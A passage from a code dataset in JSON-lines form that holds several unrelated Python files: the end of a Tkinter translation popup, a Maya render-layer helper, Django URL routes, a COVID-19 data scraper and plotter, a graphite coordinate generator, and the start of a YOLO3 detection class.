self.displayed_text)\n self.text_widget.pack(side=LEFT, fill=BOTH, expand=True)\n self.text_widget.configure(bg=self.popup.cget('bg'), relief=FLAT, state=DISABLED, font=self.font, wrap=WORD)\n\n def __create_font_widget(self):\n self.font = Font(root=self.popup, family=self.conf.get_font(), size=self.conf.get_fontsize())\n\n def __set_popup_size_and_pos(self):\n ''' Set size and position for the popup\n Details:\n - Popup size fits the text size (both horizonal and vertical side),\n but the text size cannot exceed POPUP_MAX_WIDTH or POPUP_MAX_HEIGHT\n - Popup position is at the cursor position\n '''\n ###### Size #####\n # Warning: Cannot measure(self.displayed_text) because the measure() method considers multiple lines as one line, making the width in pixels too wrong\n text_width_in_pixels = 0\n if not self.is_uicontrol_label:\n text_width_in_pixels = self.font.measure(self.translated_text)\n else:\n translated_text_width = self.font.measure(self.translated_text)\n org_text_width = self.font.measure(self.org_text)\n text_width_in_pixels = translated_text_width if translated_text_width > org_text_width else org_text_width\n\n popup_width = 0\n if text_width_in_pixels < POPUP_MAX_WIDTH: # Warning: pixels of text width and of popup width are slightly different even when the same length. Cannot know why ??\n # Therefore, popup size does not fit the text size exactly, just acceptable in most cases\n popup_width = text_width_in_pixels + PADDING*2\n else:\n popup_width = POPUP_MAX_WIDTH + PADDING\n\n line_sum = text_width_in_pixels/POPUP_MAX_WIDTH\n popup_height = line_sum*self.font.metrics(\"linespace\") + PADDING\n if (line_sum) < 1:\n line_sum = 1\n\n # For UI control label, we have to display both orginal text and translated text (plus a separate line at between),\n # we have to triple the height of popup\n if self.is_uicontrol_label:\n popup_height = 3*popup_height\n\n if popup_height > POPUP_MAX_HEIGHT:\n popup_height = POPUP_MAX_HEIGHT + PADDING\n\n ###### Position ######\n cursor_pos_x, cursor_pos_y = self.popup.winfo_pointerxy()\n\n ###### It's time to set popup size and position #######\n self.popup.geometry(\"%dx%d+%d+%d\" % (popup_width, popup_height, cursor_pos_x + 5, cursor_pos_y + 5))\n\n def __set_evenbinding(self):\n # What to do if popup is out of focus? (close the popup)\n self.popup.bind('', self.__on_focus_out)\n\n # What to do is a key (or hotkey) is pressed\n self.popup.bind('', self.__on_key_pressed)\n\n def __set_focus(self):\n ''' Force to focus on the popup when it's displayed '''\n self.popup.focus_force()\n\n def __on_focus_out(self, event):\n ''' Close the popup when clicking anywhere outside of it '''\n if self.conf.get_is_close_popup_when_outoffocus():\n self.popup.destroy()\n\n def __on_key_pressed(self, event):\n ''' Close the popup when the starting hotkey is press\n Details: When the next text is translated, the current popup is closed and the new popup is shown.\n This is useful when translating items in the UI content menu. '''\n if keyboard.is_pressed(self.conf.get_hotkey()):\n self.popup.destroy()","sub_path":"PopupTranslator/PopupTranslator/src/popup.py","file_name":"popup.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"129259503","text":"#Zed Benntt 2010\n#Remove selection and all descendants from current render layer\n\nimport maya.cmds as cmds\ndef RLremove():\n currentLayer=cmds.editRenderLayerGlobals(q=1,crl=1)\n cmds.select(hi=1)\n sel=cmds.ls(sl=1, fl=1)\n for each in sel:\n cmds.editRenderLayerMembers(currentLayer, each, r=1)","sub_path":"scripts/python/maya/lighting/zb_RLremove.py","file_name":"zb_RLremove.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"593652856","text":"from django.urls import include, path\nfrom django.conf.urls import url\n\nfrom . import views\n\napp_name = \"warehouse_viewer\"\nurlpatterns = [\n url(r'^warehouse_viewer/$', views.viewer, name=\"viewer\"),\n url(r'^index/$', views.viewer, name=\"index\"),\n url(r'^$', views.viewer, name=\"index-blank\"),\n url(r'^upload/$', views.upload, name=\"upload\"),\n url(r'^adv_search/$', views.adv_search, name=\"adv_search\"),\n\n url(r'^search_ajax/$', views.search_ajax, name=\"search_ajax\"),\n url(r'^adv_search_ajax/$', views.adv_search_ajax, name=\"adv_search_ajax\"),\n path('update_loc/', views.update_locs, name=\"update_locs\"),\n # url(r'^request_grid_map_ajax/$', ajax_func.get_grid_ajax, name=\"request_grid_map_ajax\"),\n # url(r'^request_date_ajax/$', ajax_func.get_proc_dates, name=\"request_date_ajax\"),\n # url(r'^request_map_search_info_ajax/$', ajax_func.get_map_search_info, name=\"request_map_search_info\"),\n # url(r'^date_del_ajax/$', ajax_func.delete_by_date, name=\"date_by_date\"),\n]","sub_path":"warehouse_viewer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"419105780","text":"from requests import get\nimport requests\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nimport itertools\nimport pandas as pd\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import datetime, timedelta\n\n#\n# functions to access web sites to scrape and confirm the web site is good\n#\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\ndef log_error(e):\n \"\"\"\n It is always a good idea to log errors. \n This function just prints them, but you can\n make it do anything.\n \"\"\"\n print(e)\n\n#\n# since data is updated around 11:30pm easter, find yesterday's day after midnight to get latest update\n# and pdate url to scrape with yesterday's date\n#\ndate_yesterday = datetime.strftime(datetime.now() - timedelta(1), '%m-%d-%Y')\nurl_date_yesterday = 'https://github.com/CSSEGISandData/COVID-19/blob/master/csse_covid_19_data/csse_covid_19_daily_reports/' + str(date_yesterday) + '.csv'\n\n#\n# scrape country, deaths, confirmed cases from CSEE Johns Hopkins University (JHU)\n#\ncountries_unique = pd.DataFrame()\njhu_raw_html = simple_get(url_date_yesterday)\njhu_soup = BeautifulSoup(jhu_raw_html, 'lxml')\njhu_table = jhu_soup.find_all('table')[0]\njhu_df = pd.read_html(str(jhu_table))[0]\ncountries_unique['jhu'] = jhu_df['Country_Region'].unique()\n\n#\n# sum confirmed cases, deaths columns per country from JHU\n#\ncountry_records_sum = pd.DataFrame()\ncountry_totals = pd.DataFrame()\nfor country in countries_unique['jhu']:\n country_records = jhu_df.loc[jhu_df['Country_Region'] == country, ['Country_Region', 'Confirmed', 'Deaths']]\n country_records_sum.at[0, 'Country'] = country\n country_records_sum.at[0, 'Confirmed'] = (country_records['Confirmed']).sum()\n country_records_sum.at[0, 'Deaths'] = (country_records['Deaths']).sum()\n country_records_sum.at[0, \"Population\"] = ''\n country_totals = country_totals.append(country_records_sum, ignore_index=True)\n\n#\n# scrape population by country data from World of Meters (WoM)\n#\nwom_pop_html = simple_get('https://www.worldometers.info/world-population/population-by-country')\nwom_pop_countries_unique = pd.DataFrame()\nwom_pop_soup = BeautifulSoup(wom_pop_html, 'lxml')\nwom_pop_table = wom_pop_soup.find_all('table')[0]\nwom_pop_df = pd.read_html(str(wom_pop_table))[0]\nwom_pop_countries_unique['wom_pop'] = wom_pop_df['Country (or dependency)'].unique()\ncountries_unique = pd.concat([countries_unique, wom_pop_countries_unique], axis=1)\ncountries_unique.to_excel(\"CountriesUnique.xlsx\")\n\n#\n# list of countries that are common to beoth JHU and WoM\n#\ncommon = list(set(countries_unique['jhu']) & set(countries_unique['wom_pop']))\n\n#\n# add countries from JHU to common that are not in WoM\n#\ncommon.append('US')\ncommon.append('Taiwan*')\ncommon.append('Cote d\\'Ivoire')\ncommon.append('Czechia')\ncommon.append('Korea, South')\n#common.append('Saint Kitts and Nevis')\ncommon.append('Saint Vincent and the Grenadines')\n\n#\n# assign country names from WoM to JHU so can look up population from WoM\n#\nfor country in common:\n new_country = ''\n if country == 'US':\n new_country = 'United States'\n elif country == 'Taiwan*':\n new_country = 'Taiwan'\n elif country == 'Cote d\\'Ivoire':\n new_country = 'Côte d\\'Ivoire'\n elif country == 'Czechia':\n new_country = 'Czech Republic (Czechia)'\n elif country == 'Korea, South':\n new_country = 'South Korea'\n# elif country == 'Saint Kitts and Nevis':\n# new_country == 'Saint Kitts & Nevis'\n elif country == 'Saint Vincent and the Grenadines':\n new_country = 'St. Vincent & Grenadines'\n else:\n new_country = country\n\n#\n# add 'Population' column to country_totals dataframe\n#\n country_population = wom_pop_df.loc[wom_pop_df['Country (or dependency)'] == new_country, ['Country (or dependency)', 'Population (2020)']]\n this_population = country_population['Population (2020)']\n country_totals.loc[country_totals['Country'] == country, ['Population']] = int(this_population)\n\n#\n# remove countries for whom I couldn't get population data\n#\ncountry_totals['Population'].replace('', np.nan, inplace=True)\ncountry_totals.dropna(subset=['Population'], inplace=True)\n\n#\n# calculate per capita data and multiply times 100 to make it a percent\n#\ncountry_totals['Confirmed/Population'] = (country_totals['Confirmed']/country_totals['Population']) * 100\ncountry_totals['Deaths/Confirmed'] = (country_totals['Deaths'] /country_totals['Confirmed']) * 100\ncountry_totals.sort_values(by=['Confirmed'], inplace=True, ascending=False)\ncountry_totals.to_excel(\"CountryTotals.xlsx\")\n\n#\n# variable to define minimum number of confirmed cases when pulling countries to display\n#\ncase_limit = 2000\n\n#\n# create x, y bar chart for total confirmed cases per country\n#\ncountry_totals_list_confirmed = country_totals.loc[country_totals['Confirmed'] > case_limit]\ncountry_totals_list_confirmed.sort_values(by=['Confirmed'], inplace=True, ascending=False)\ncountry_totals_list_confirmed.to_excel(\"CountryTotalsList.xlsx\", sheet_name='SortedConfirmed')\ncountry_totals_list_confirmed.plot(kind='bar', x='Country', y='Confirmed')\nplt.title('Confirmed Corona Virus Cases per Country (2000 Cases or More)')\nplt.ylabel('# Confirmed Cases')\nplt.grid(axis='y')\n\n#\n# create x, y bar chart for total deaths per country\n#\ncountry_totals_list_deaths = country_totals.loc[country_totals['Confirmed'] > case_limit]\ncountry_totals_list_deaths.sort_values(by=['Deaths'], inplace=True, ascending=False)\ncountry_totals_list_deaths.to_excel(\"CountryTotalsDeaths.xlsx\", sheet_name='SortedDeaths')\ncountry_totals_list_deaths.plot(kind='bar', x='Country', y='Deaths')\nplt.title('Deaths Total per Country (for Countries with at least 2000 Confirmed Cases)')\nplt.ylabel('# of Deaths')\nplt.grid(axis='y')\n\n#\n# create x, y bar chart for % confirmed cases per capita by country\n#\ncountry_totals_list_confirmedpercent = country_totals.loc[country_totals['Confirmed'] > case_limit]\ncountry_totals_list_confirmedpercent.sort_values(by=['Confirmed/Population'], inplace=True, ascending=False)\ncountry_totals_list_confirmedpercent.to_excel(\"CountryTotalsListConfirmedPercent.xlsx\", sheet_name='ConfirmedPercent')\ncountry_totals_list_confirmedpercent.plot(kind='bar', x='Country', y='Confirmed/Population')\nplt.title('Confirmed Corona Virus Cases as a Fraction of Country Population (for Countries with at least 2000 Confirmed Cases)')\nplt.ylabel('(%) Confirmed Cases / Population')\nplt.grid(axis='y')\n\n#\n# create x, y bar chart for % deaths as fraction of confirmed cases per country\n#\ncountry_totals_list_deathspercent = country_totals.loc[country_totals['Confirmed'] > case_limit]\ncountry_totals_list_deathspercent.sort_values(by=['Deaths/Confirmed'], inplace=True, ascending=False)\ncountry_totals_list_deathspercent.to_excel(\"CountryTotalsListDeathsPercent.xlsx\", sheet_name='DeathsPercent')\ncountry_totals_list_deathspercent.plot(kind='bar', x='Country', y='Deaths/Confirmed')\nplt.title('Deaths from Corona Virus Cases as a Fraction of Confirmed Cases (for Countries with at least 2000 Confirmed Cases)')\nplt.ylabel('(%) Deaths / Confirmed Cases')\nplt.grid(axis='y')\n\n\n#\n# time series charts\n#\n\n#\n# scrape country, deaths, confirmed cases from CSEE Johns Hopkins University (JHU)\n#\ncountries_unique_ts_confirmed = pd.DataFrame()\njhu_ts_confirmed_raw_html = simple_get(\n 'https://github.com/CSSEGISandData/COVID-19/blob/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv')\njhu_ts_confirmed_soup = BeautifulSoup(jhu_ts_confirmed_raw_html, 'lxml')\njhu_ts_confirmed_table = jhu_ts_confirmed_soup.find_all('table')[0]\njhu_ts_confirmed_df = pd.read_html(str(jhu_ts_confirmed_table))[0]\ncountries_unique_ts_confirmed['jhu'] = jhu_ts_confirmed_df['Country/Region'].unique()\njhu_ts_confirmed_df.to_excel(\"JHUTimeSeriesConfirmed.xlsx\")\n\ncountries_unique_ts_deaths = pd.DataFrame()\njhu_ts_deaths_raw_html = simple_get(\n 'https://github.com/CSSEGISandData/COVID-19/blob/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv')\njhu_ts_deaths_soup = BeautifulSoup(jhu_ts_deaths_raw_html, 'lxml')\njhu_ts_deaths_table = jhu_ts_deaths_soup.find_all('table')[0]\njhu_ts_deaths_df = pd.read_html(str(jhu_ts_deaths_table))[0]\ncountries_unique_ts_deaths['jhu'] = jhu_ts_deaths_df['Country/Region'].unique()\njhu_ts_deaths_df.to_excel(\"JHUTimeSeriesDeaths.xlsx\")\n\njhu_ts_confirmed_diff_df = jhu_ts_confirmed_df\njhu_ts_confirmed_diff_columns = list(jhu_ts_confirmed_diff_df.columns.values)\ndel jhu_ts_confirmed_diff_columns[0:5]\n\n\n\n\n#\n# sum confirmed cases, deaths columns per country from JHU\n#\ncountry_records_ts_confirmed_sum = pd.DataFrame()\ncountry_totals_ts_confirmed = pd.DataFrame()\njhu_ts_confirmed_df_columns = list(jhu_ts_confirmed_df.columns.values)\ndel jhu_ts_confirmed_df_columns[0:5]\nfor country in countries_unique_ts_confirmed['jhu']:\n for column in jhu_ts_confirmed_df.columns[5:]:\n country_records_ts_confirmed = jhu_ts_confirmed_df.loc[jhu_ts_confirmed_df['Country/Region'] == country]\n country_records_ts_confirmed_sum.at[0, 'Country'] = str(country)\n country_records_ts_confirmed_sum.at[0, column] = country_records_ts_confirmed[column].sum()\n country_totals_ts_confirmed = country_totals_ts_confirmed.append(country_records_ts_confirmed_sum, ignore_index=True)\ncountry_totals_ts_confirmed.to_excel(\"CountryTotalsTSConfirmed.xlsx\")\ncountry_records_ts_confirmed = jhu_ts_confirmed_df.loc[jhu_ts_confirmed_df['Country/Region'] == country]\ncountry_totals_ts_confirmed.set_index('Country', inplace=True)\ndf_transpose = country_totals_ts_confirmed.transpose()\ndf_transpose.to_excel(\"Transposed.xlsx\")\n\n\ncountry_records_ts_deaths_sum = pd.DataFrame()\ncountry_totals_ts_deaths = pd.DataFrame()\njhu_ts_deaths_df_columns = list(jhu_ts_deaths_df.columns.values)\ndel jhu_ts_deaths_df_columns[0:5]\nfor country in countries_unique_ts_deaths['jhu']:\n for column in jhu_ts_deaths_df.columns[5:]:\n country_records_ts_deaths = jhu_ts_deaths_df.loc[jhu_ts_deaths_df['Country/Region'] == country]\n country_records_ts_deaths_sum.at[0, 'Country'] = str(country)\n country_records_ts_deaths_sum.at[0, column] = country_records_ts_deaths[column].sum()\n country_totals_ts_deaths = country_totals_ts_deaths.append(country_records_ts_deaths_sum, ignore_index=True)\ncountry_totals_ts_deaths.to_excel(\"CountryTotalsTSDeaths.xlsx\")\ncountry_records_ts_deaths = jhu_ts_deaths_df.loc[jhu_ts_deaths_df['Country/Region'] == country]\ncountry_totals_ts_deaths.set_index('Country', inplace=True)\ndf_transpose_deaths = country_totals_ts_deaths.transpose()\ndf_transpose_deaths.to_excel(\"TransposedDeaths.xlsx\")\n\n\nx_ticks = range(0, len(df_transpose_deaths) + 10)\nx_labels = df_transpose_deaths.index.values\nline_labels = pd.DataFrame(columns=['Country', 'x', 'y'])\ncountry_column = df_transpose_deaths.columns\nline_labels_temp = pd.DataFrame()\nfor country in country_column:\n line_labels_temp.at[0, 'Country'] = country\n line_labels_temp.at[0, 'y'] = int(df_transpose_deaths[country].max())\n line_labels = line_labels.append(line_labels_temp, ignore_index=True)\nline_labels['x'] = len(df_transpose_deaths)\n\n'''\ndeaths_world_plot = df_transpose_deaths.plot(kind='line', x=df_transpose_deaths.index, y=df_transpose_deaths.columns, xticks=x_ticks, legend=False)\nplt.xticks(rotation=90, fontsize='small')\nplt.title('Confirmed Corona Virus Deaths Around the World')\nplt.ylabel('# of Deaths')\ndeaths_world_plot.set_facecolor('#cceeff')\nplt.grid(linestyle=':', linewidth='0.5', color='gray')\nfor key, row in line_labels.iterrows():\n country = row['Country']\n x = row['x']\n y = row['y']\n print(country + ' - ' + str(x) + ' - ' + str(y))\n plt.annotate(country, (x, y), ha='left', va='center', fontsize=8)\n'''\n\ndf_transpose_min_deaths = pd.DataFrame()\nfor country in line_labels['Country']:\n df_transpose_deaths_temp = df_transpose_deaths.loc[df_transpose_deaths[country] > 0, [country]]\n if len(df_transpose_deaths_temp) > 0:\n df_transpose_deaths_temp.reset_index(inplace=True)\n print(df_transpose_deaths_temp)\n df_transpose_min_deaths = pd.concat([df_transpose_min_deaths, df_transpose_deaths_temp[country]], axis=1)\ndf_transpose_min_deaths.to_excel(\"MinDeaths.xlsx\")\n\nx_ticks = range(0, len(df_transpose_min_deaths) + 10)\nx_labels = df_transpose_min_deaths.index.values\nline_labels = pd.DataFrame(columns=['Country', 'x', 'y'])\ncountry_column = df_transpose_min_deaths.columns\nline_labels_temp = pd.DataFrame()\nfor country in country_column:\n line_labels_temp.at[0, 'Country'] = country\n line_labels_temp.at[0, 'y'] = int(df_transpose_min_deaths[country].max())\n line_labels = line_labels.append(line_labels_temp, ignore_index=True)\nline_labels['x'] = len(df_transpose_min_deaths)\n\ndeaths_world_time_zero_plot = df_transpose_min_deaths.plot(kind='line', x=df_transpose_min_deaths.index, y=df_transpose_min_deaths.columns, xticks=x_ticks, legend=False)\nplt.xticks(rotation=90, fontsize='small')\nplt.title('Confirmed Corona Virus Deaths Around the World - Days Elapsed Since Time 0 (0 Deaths)')\nplt.ylabel('# of Deaths Since Time Zero')\nplt.xlabel('# of Days Elapsed')\ndeaths_world_time_zero_plot.set_facecolor('#cceeff')\nplt.grid(linestyle=':', linewidth='0.5', color='gray')\nfor key, row in line_labels.iterrows():\n country = row['Country']\n x = row['x']\n y = row['y']\n print(country + ' - ' + str(x) + ' - ' + str(y))\n plt.annotate(country, (x, y), ha='left', va='center', fontsize=8)\n\n\n#\n# time series data line graphs for all countries (plan of record)\n#\nx_ticks = range(0, len(df_transpose) + 10)\nx_labels = df_transpose.index.values\nline_labels = pd.DataFrame(columns=['Country', 'x', 'y'])\ncountry_column = df_transpose.columns\nline_labels_temp = pd.DataFrame()\nfor country in country_column:\n line_labels_temp.at[0, 'Country'] = country\n line_labels_temp.at[0, 'y'] = int(df_transpose[country].max())\n line_labels = line_labels.append(line_labels_temp, ignore_index=True)\nline_labels['x'] = len(df_transpose)\nprint(line_labels)\n\ncases_world_plot = df_transpose.plot(kind='line', x=df_transpose.index, y=df_transpose.columns, xticks=x_ticks, legend=False)\nplt.xticks(rotation=90, fontsize='small')\nplt.title('Confirmed Corona Virus Cases Around the World')\nplt.ylabel('# of Confirmed Cases')\ncases_world_plot.set_facecolor('#cceeff')\nplt.grid(linestyle=':', linewidth='0.5', color='gray')\nfor key, row in line_labels.iterrows():\n country = row['Country']\n x = row['x']\n y = row['y']\n print(country + ' - ' + str(x) + ' - ' + str(y))\n plt.annotate(country, (x, y), ha='left', va='center', fontsize=8)\n\n#\n# time series data line graphs based on time 0 alignment for all countries with minimal # of cases (days since cases = xxx)\n#\ndf_transpose_min_cases = pd.DataFrame()\nfor country in line_labels['Country']:\n df_transpose_temp = df_transpose.loc[df_transpose[country] >= 1000, [\n country]]\n if len(df_transpose_temp) > 0:\n df_transpose_temp.reset_index(inplace=True)\n print(df_transpose_temp)\n df_transpose_min_cases = pd.concat([df_transpose_min_cases, df_transpose_temp[country]], axis=1)\ndf_transpose_min_cases.to_excel(\"MinCases.xlsx\")\n\nx_ticks = range(0, len(df_transpose_min_cases) + 10)\nx_labels = df_transpose_min_cases.index.values\nline_labels = pd.DataFrame(columns=['Country', 'x', 'y'])\ncountry_column = df_transpose_min_cases.columns\nline_labels_temp = pd.DataFrame()\nfor country in country_column:\n line_labels_temp.at[0, 'Country'] = country\n line_labels_temp.at[0, 'y'] = int(df_transpose_min_cases[country].max())\n line_labels = line_labels.append(line_labels_temp, ignore_index=True)\nline_labels['x'] = len(df_transpose_min_cases)\n\nline_labels.to_excel(\"LineLabels.xlsx\")\n\n\ncases_since_time_zero_plot = df_transpose_min_cases.plot(kind='line', x=df_transpose_min_cases.index, y=df_transpose_min_cases.columns, xticks=x_ticks, legend=False)\nplt.xticks(rotation=90, fontsize='small')\nplt.title('Confirmed Corona Virus Cases Around the World - Days Elapsed Since 1000 Cases')\nplt.ylabel('# of Confirmed Cases')\nplt.xlabel('# of Days Elapsed Since 1000 Cases')\ncases_since_time_zero_plot.set_facecolor('#cceeff')\nplt.grid(linestyle=':', linewidth='0.5', color='gray')\nfor key, row in line_labels.iterrows():\n country = row['Country']\n x = row['x']\n y = row['y']\n print(country + ' - ' + str(x) + ' - ' + str(y))\n plt.annotate(country, (x, y), ha='left', va='center', fontsize=8)\n\n\n#\n# Daily new confirmed cases\n#\ni = 1\ndiff_df_temp = pd.DataFrame()\ntotal_columns = len(country_totals_ts_confirmed.columns)\nprint('Total columns = ' + str(total_columns))\nthiscolname = country_totals_ts_confirmed.columns.values[total_columns - 1]\ncases_threshold = country_totals_ts_confirmed.loc[country_totals_ts_confirmed[thiscolname] >= 10000]\nprint(cases_threshold)\nfor index in range(cases_threshold.shape[1] - 1):\n colname = cases_threshold.columns[index + i]\n prevcolname = cases_threshold.columns[index + i - 1]\n diff_df_temp[colname] = cases_threshold[colname] - cases_threshold[prevcolname]\n diff_df_temp.to_excel(\"Difference.xlsx\")\n\ndiff_df = pd.DataFrame()\ndiff_df = diff_df_temp\n\ndiff_transpose_df = diff_df.transpose()\ndiff_transpose_df.to_excel(\"DifferenceTranspose.xlsx\")\n\nx_ticks = range(0, len(diff_transpose_df) + 10)\nx_labels = diff_transpose_df.index.values\nline_labels = pd.DataFrame(columns=['Country', 'x', 'y'])\ncountry_column = diff_transpose_df.columns\nline_labels_temp = pd.DataFrame()\nfor country in country_column:\n line_labels_temp.at[0, 'Country'] = country\n line_labels_temp.at[0, 'y'] = int(diff_transpose_df[country].iloc[-1])\n line_labels = line_labels.append(line_labels_temp, ignore_index=True)\nline_labels['x'] = len(diff_transpose_df)\n\ndaily_new_cases_plot = diff_transpose_df.plot(kind='line', x=diff_transpose_df.index, y=diff_transpose_df.columns, xticks=x_ticks, legend=False, title=\"Daily New Cases\")\nplt.xticks(rotation=90, fontsize='small')\nplt.title('Number of Daily New Confirmed Cases per Country (Countries with 10K or More Cases)')\nplt.ylabel('# of Daily New Confirmed Cases')\nplt.xlabel('Date')\n#plt.ylim(0, 50000)\ndaily_new_cases_plot.set_facecolor('#cceeff')\nplt.grid(linestyle=':', linewidth='0.5', color='gray')\n#plt.legend()\nfor key, row in line_labels.iterrows():\n country = row['Country']\n x = row['x']\n y = row['y']\n plt.annotate(country, (x, y), ha='left', va='center', fontsize=6)\n\n\n\nplt.show()\n\n","sub_path":"GlobalCoronaDailyInfections.py","file_name":"GlobalCoronaDailyInfections.py","file_ext":"py","file_size_in_byte":19358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"379426287","text":"from decimal import Decimal as dec\nimport numpy as np\nfrom math import radians as rad\n\n#Vectors definition\na = 2.4640\na1x = a*np.sin(rad(30))\na1y = a*np.cos(rad(30))\n\n# R_0 definition\n#atom 1\nrx = [2.456, 3.684]\nry = [-2.83594, -2.12696]\n\npositions = []\ncorddinates = []\n\nfor k in range(0,2,1):\n for n in range(0,5,1):\n for j in range(0,5,1):\n positions.append('%.7f' % dec( rx[k] + n*a1x + j*a1x ) ) # x cordinates\n positions.append('%.7f' % dec( ry[k] + n*a1y - j*a1y ) ) # y cordinates\n corddinates.append(positions.copy())\n positions.clear()\n\narquivo = open(\"grafite.xyz\",\"w\")\narquivo.write(\"{}\\n\\n\".format(len(corddinates)))\n\nfor t in range(0,3,1):\n for item in corddinates:\n arquivo.write('C\\t{0[0]}\\t{0[1]}\\t {1}.00000000\\n'.format(item,3*t))\n","sub_path":"ts.py","file_name":"ts.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"462546983","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/12/6 10:50\n# @Author : panzi\n# @Site : yolo模型预测\n# @File : yolo3_predict.py\n# @Software: PyCharm Community Edition\n\nimport colorsys\nimport os\nfrom timeit import default_timer as timer\nimport numpy as np\nfrom keras import backend as K\nfrom keras.models import load_model\nfrom keras.layers import Input\nfrom PIL import Image, ImageFont, ImageDraw\nfrom yolo3.model import yolo_eval, yolo_body, tiny_yolo_body\nfrom yolo3.utils import letterbox_image\nimport os\nfrom keras.utils import multi_gpu_model\nfrom keras.utils import plot_model\nimport cv2\nfrom PIL import Image\nfrom config import YOLO3Config as C\nimport tensorflow as tf\nfrom pub.Lkmeans import AGNES,box_dist,idokonw\nfrom pub.RedChannel import GetRedC\nimport ctpn_predict\n\nclass YOLO3:\n\n def __init__(self):\n\n if C.USE_GPU:\n # 如果使用GPU\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = C.gpu_id # 使用 GPU 0和1\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n K.set_session(sess)\n\n self.model_path = C.model_path\n self.anchors_path = C.anchors_path\n self.classes_path = C.classes_path\n self.score = C.score\n self.iou = C.iou\n self.model_image_size = C.input_shape\n\n self.class_names = self._get_class()\n self.anchors = self._get_anchors()\n self.sess = K.get_session()\n self.boxes, self.scores, self.classes = self.generate()\n self.colors = self.__get_colors(self.class_names)\n\n\n def _get_class(self):\n classes_path = os.path.expanduser(self.classes_path)\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\n def _get_anchors(self):\n anchors_path = os.path.expanduser(self.anchors_path)\n with open(anchors_path) as f:\n anchors = f.readline()\n anchors = [float(x) for x in anchors.split(',')]\n return np.array(anchors).reshape(-1, 2)\n\n\n @staticmethod\n def __get_colors(names):\n # 不同的框,不同的颜色\n hsv_tuples = [(float(x) / len(names), 1., 1.)\n for x in range(len(names))] # 不同颜色\n colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors)) # RGB\n np.random.seed(10101)\n np.random.shuffle(colors)\n np.random.seed(None)\n\n return colors\n\n def generate(self):\n model_path = os.path.expanduser(self.model_path) # 转换~\n assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'\n\n num_anchors = len(self.anchors) # anchors的数量\n num_classes = len(self.class_names) # 类别数\n\n\n self.yolo_model = yolo_body(Input(shape=(416, 416, 3)), 3, num_classes)\n self.yolo_model.load_weights(model_path) # 加载模型参数\n\n print('{} model, {} anchors, and {} classes loaded.'.format(model_path, num_anchors, num_classes))\n\n # 根据检测参数,过滤框\n self.input_image_shape = K.placeholder(shape=(2,))\n boxes, scores, classes = yolo_eval(\n self.yolo_model.output, self.anchors, len(self.class_names),\n self.input_image_shape, score_threshold=self.score, iou_threshold=self.iou)\n return boxes, scores, classes\n\n\n def predict(self,image,image_path=''):\n '''\n 真正的预测函数\n :param image:\n :return:\n '''\n start = timer() # 起始时间\n if self.model_image_size != (None, None): # 416x416, 416=32*13,必须为32的倍数,最小尺度是除以32\n assert self.model_image_size[0] % 32 == 0, 'Multiples of 32 required'\n assert self.model_image_size[1] % 32 == 0, 'Multiples of 32 required'\n boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size))) # 填充图像\n else:\n new_image_size = (image.width - (image.width % 32), image.height - (image.height % 32))\n boxed_image = letterbox_image(image, new_image_size)\n image_data = np.array(boxed_image, dtype='float32')\n print('detector size {}'.format(image_data.shape))\n image_data /= 255. # 转换0~1\n image_data = np.expand_dims(image_data, 0) # 添加批次维度,将图片增加1维\n\n # 参数盒子、得分、类别;输入图像0~1,4维;原始图像的尺寸\n out_boxes, out_scores, out_classes = self.sess.run(\n [self.boxes, self.scores, self.classes],\n feed_dict={\n self.yolo_model.input: image_data,\n self.input_image_shape: [image.size[1], image.size[0]],\n K.learning_phase(): 0\n })\n\n result = []\n for i, c in reversed(list(enumerate(out_classes))):\n predicted_class = self.class_names[c] # 类别\n box = out_boxes[i] # 框\n score = out_scores[i] # 执行度\n label = '{} {:.2f}'.format(predicted_class, score) # 标签\n top, left, bottom, right = box\n top = max(0, np.floor(top + 0.5).astype('int32'))\n left = max(0, np.floor(left + 0.5).astype('int32'))\n bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n print(label, (left, top), (right, bottom)) # 边框\n result.append([c,predicted_class,score,[left, top, right, bottom]])\n return (image_path,result)\n\n def detect_image(self, image):\n start = timer() # 起始时间\n\n if self.model_image_size != (None, None): # 416x416, 416=32*13,必须为32的倍数,最小尺度是除以32\n assert self.model_image_size[0] % 32 == 0, 'Multiples of 32 required'\n assert self.model_image_size[1] % 32 == 0, 'Multiples of 32 required'\n boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size))) # 填充图像\n else:\n new_image_size = (image.width - 